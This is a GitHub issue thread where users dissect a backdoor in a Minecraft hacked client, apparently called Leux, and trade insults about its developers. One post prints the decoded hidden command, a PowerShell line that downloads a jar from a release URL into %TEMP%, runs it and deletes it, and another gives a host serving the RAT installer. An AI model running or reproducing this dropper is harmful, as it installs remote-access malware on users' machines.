Open master7720 opened 2 years ago
i can legit clean it in the type it takes me to type this shit lol
@master7720 why would u want to use this, i mean, this is not an official version, this was designed to rat me
cmd /c powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/ObsidianBreaker/TestProject/releases/download/v1/TP.jar','%TEMP%\\\\TP.jar');&java -jar %TEMP%\\\\TP.jar&del %TEMP%\\\\TP.jar /f
another rat (?) lol, found in BlockInteractionHelper (https://github.com/ssllllll/LeuxBackdoor0.9-Deobf/blob/main/me/sazked/leux/client/util/BlockInteractHelper.java#L317#L319)
what did you do to piss these guys off
WTF IS THAT
I exposed them because they rat their members since the first release so i exposed them, my videos went viral, they ratted me, they nuked me
i dont know what it is, but the repo is gone.
you might have another RAT in your pc lol
i guess you could email github for a copy but i doubt they'd even have a backup or if theyd even disclose anything about it
Maybe it is a private repo, i have the rat from the same guy in my other computer but they cant do nothing because i have new brand pc, new token, new acc, etc
however by a quick search of the repo, it seems nothing is done with those strings, so you should be fine
where did u find that
BlockInteractHelper with Base64 imports 😹
i quickly did a btoa
in the dev console by looking at the strings and you have to decode them twice, then i just combined the strings and that was the order that made sense, which turns out to be a whole ass command that runs another jar
and yeah love it when i have to decode my block positions with base4
probably that jar downloads and executes another jar
probably lol, just like every phobos skid that comes out
https://copenn.000webhostapp.com/upload/installer.key
This downloads the installer, the installer downloads the updater (the remote access tool), i though that would be everything BUT now that i see the BlockInteractionHelper probably it downloads 567897654567 things
i did end up looking at that yeah, which once that installer downloads, it injects a .dat file somewhere.
all you have to do is change .key -> .jar, how nice of the leux devs to make it so easy
YES, i decompiled the .key but sadly it is obfuscated with JNIC 😢
how unfortunate, its probably just skidded from yoink rat, kinda like the whole client is a shitty phobos skid kek
wurst* the client started being a wurst skid 😹
LMAO WHAT. like fucking wurstclient, how the hell and why the hell from WURST
i mean props to alexander but damn his client is shit, why the fuck would you skid from wurst of all clients
IKR, WURST I THE WORST SHIT YOU'LL SEE 😹 😹 😹
HOW DUMB CAN U BE TO SKID WURST AHAHAH
obviously the leux devs are a great example. should ask them if they know what a boolean is, they probably couldnt answer or would be sweating to google what a boolean is and give you the word by word definition from wikipedia.
oh, and please tell me thats not even close to the real src of leux. its so fucking bad
nah, its the 0.6 version with empty modules, take a look at the PistonAura module
the 0.9 is well done but it still being a skid
the code looks like mega shit though, so many unused methods and the just formatting of the code hurts me
My eyes hurt kkkkk
Russian callate un rato
legit just remove the backdoor it says where the RAT is already